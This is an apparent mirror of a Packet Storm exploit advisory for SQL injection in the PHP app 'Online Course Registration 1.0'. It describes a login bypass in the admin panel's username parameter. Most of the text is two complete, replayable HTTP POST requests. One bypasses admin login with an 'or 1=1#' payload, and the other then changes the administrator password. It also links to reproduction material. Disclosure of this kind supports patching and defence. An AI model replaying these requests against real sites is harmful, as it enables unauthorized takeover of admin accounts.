Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:172566
HistoryMay 25, 2023 - 12:00 a.m.

2023 Online Course Registration 1.0 SQL Injection

2023-05-2500:00:00
nu11secur1ty
packetstormsecurity.com
155
JSON
`## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing  
## Author: nu11secur1ty  
## Date: 05.25.2023  
## Vendor: https://github.com/nikhilkeshava  
## Software: https://github.com/nikhilkeshava/online-course-registration-  
## Reference: https://portswigger.net/web-security/sql-injection,  
https://portswigger.net/web-security/sql-injection/lab-login-bypass  
  
## Description:  
The `username` parameter appears to be vulnerable to SQL injection  
attacks. The payloads 77834251' or 6127=6127-- and 98762777' or  
4535=4542-- were each submitted in the username parameter. These two  
requests resulted in different responses, indicating that the input is  
unsafely incorporated into a SQL query. The attacker can use this  
bypass login vulnerability to send a remote POST request to set a new  
administrator password for himself, which is absolutely nasty.  
  
STATUS: HIGH Vulnerability  
  
[+]Payload:  
```POST  
POST /online-course-registration/admin/index.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn  
Content-Length: 62  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/online-course-registration/admin/index.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
username=nu11secur1ty%27+or+1%3D1%23&password=password&submit=  
  
```  
[+]Exploit:  
```POST  
POST /online-course-registration/admin/change-password.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=38468sipptm9j24j9e8svavpgn  
Content-Length: 58  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/online-course-registration/admin/change-password.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
cpass=password&newpass=password5&cnfpass=password5&submit=  
  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)  
  
## Time spend:  
01:15:00  
  
  
`
JSON